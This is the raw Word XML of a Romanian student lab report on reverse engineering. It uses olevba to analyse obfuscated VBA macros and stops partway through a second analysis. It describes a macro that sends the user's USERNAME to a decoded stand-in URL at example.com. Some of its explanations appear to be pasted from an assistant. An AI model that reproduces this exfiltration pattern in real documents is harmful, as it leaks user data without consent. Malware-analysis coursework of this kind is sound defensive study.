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5</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„Tehnici de Inginerie Inversa</w:t>
      </w:r>
      <w:r>
        <w:rPr>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C. Maxim</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Style w:val="Normaltextrun"/>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ro-RO"/>
        </w:rPr>
        <w:t>Chișinău – 2024</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:ind w:left="0" w:right="1130"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Mersul lucrări:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:ind w:left="0" w:right="1130"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New roman" w:hAnsi="Times New roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New roman" w:hAnsi="Times New roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Laboratorul dat a fost realizat în sistemul de operare Linux de aceea foloses utilita olevba.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Olevba este o unealtă pentru analiza macro-urilor din documentele Office pe sistemele de operare Linux. Aceasta face parte din pachetul python-oletools și se concentrează pe identificarea potențialelor amenințări de securitate, cum ar fi codul malicios sau exploatarea documentelor Office. Olevba oferă funcționalități precum analiza macro-urilor, detectarea funcțiilor suspecte, identificarea exploatarelor Office și generarea de rapoarte detaliate. Această unealtă este utilă în procesul de analiză a securității, ajutând la identificarea și înțelegerea posibilelor riscuri asociate cu macro-urile din documentele Office.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:ind w:left="0" w:right="1130"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts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34965" cy="2609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4965" cy="2609215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="0" w:left="0" w:right="0"/>
        <w:rPr>
          <w:bdr w:val="single" w:sz="2" w:space="1" w:color="E3E3E3"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bdr w:val="single" w:sz="2" w:space="1" w:color="E3E3E3"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:ind w:left="0" w:right="1130"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:ind w:left="0" w:right="1130"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>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rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Figura 1 — Meniul help pentru olevba</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Comanda "olevba This\ is\ a\ sample\ document.doc" rulează utilitarul Olevba pe documentul specificat, "This is a sample document.doc", pentru a efectua o analiză statică a macro-urilor din acel document Office. Olevba furnizează informații relevante despre macro-uri, funcții suspecte și alte caracteristici care pot indica potențiale riscuri de securitate, cum ar fi existența codului malicios sau a exploatarelor. Este o metodă de evaluare a securității documentului Office pentru a identifica și înțelege eventualele amenințări.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>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52515" cy="2409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2515" cy="2409190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Figura 2 – Rularea utilitei olevba</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>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52515" cy="1485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52515" cy="1485900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Figura 3 – Codul care se va executa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Codul este scris în Visual Basic for Applications (VBA), un limbaj de programare folosit pentru automatizarea sarcinilor în aplicațiile Microsoft Office. Codul pare a fi obfuscate, ceea ce înseamnă că a fost deliberat făcut dificil de înțeles. Acest lucru se face adesea pentru a proteja codul de copierea sau modificarea de către utilizatori neautorizați.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Iată o descriere mai detaliată a codului:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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 xml:space="preserve">Codul definește o subrutină numită „a”. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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 xml:space="preserve">Subrutina creează două șiruri: </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Primul șir este o combinație de caractere care, decodificat, dezvăluie „[URL-ul nevalid a fost eliminat][username]”. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>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Al doilea șir este un array de numere care pare a fi utilizat pentru manipularea datelor. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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 xml:space="preserve">Subrutina creează apoi un obiect și deschide o conexiune la URL-ul specificat în primul șir. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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 xml:space="preserve">Subrutina trimite date către URL și apoi primește un răspuns. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:left="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Subrutina folosește apoi funcția de aplicație VBA „Choose” pentru a selecta o valoare din array pe baza răspunsului de la URL. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Acesta este URL ascuns:  </w:t>
      </w:r>
      <w:hyperlink r:id="rId5">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b w:val="false"/>
            <w:bCs w:val="false"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://example.com/receive.php?username=USERNAME</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Această adresă URL este compusă din următoarele componente:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Protocolul: "http://"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Domeniul: "example"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Extensia de domeniu: "COM"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Calea către fișierul "receive.php"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:left="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Parametrul "username" este adăugat în URL și este setat la valoarea returnată de funcția Environ(USERNAME), unde USERNAME este numele de utilizator al mediului de operare (sistemul de operare).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>În codul dat, valoarea exactă a parametrului "username" este determinată folosind funcția Environ, care returnează valoarea variabilei de mediu "USERNAME". Aceasta poate fi numele de utilizator al sistemului de operare, care va fi apoi transmis către serverul de la adresa URL specificată.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>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52515" cy="1908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52515" cy="1908175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figura 4 — Hint de la olevba (explicatie funtilor)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>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52515" cy="2404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52515" cy="2404745"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figura 5 — Determinarea macrosului</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Observații:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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 xml:space="preserve">Documentul Word conține macrocomenzi VBA care sunt executate automat la deschiderea documentului sau la click pe butoanele de comandă. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:left="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Macrocomenzile VBA utilizează variabile de tip String pentru a stoca text. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:left="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Macrocomenzile VBA pot fi utilizate pentru a afișa mesaje de tip MsgBox sau InputBox. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>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52515" cy="27457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52515" cy="2745740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figura 6 — Macrosul in fisierul `lab5x.docm`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Codul pe care l-ați furnizat este scris în Visual Basic for Applications (VBA) și pare a fi obscurat, ceea ce înseamnă că a fost făcut deliberat dificil de înțeles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Iată o analiză a codului:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:left="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Declararea variabilelor:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>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Codul declară patru variabile: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:left="2127"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> și </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>yyy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ca șiruri de caractere (string) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:left="2127"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> și </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ca numere întregi (integer) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:left="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
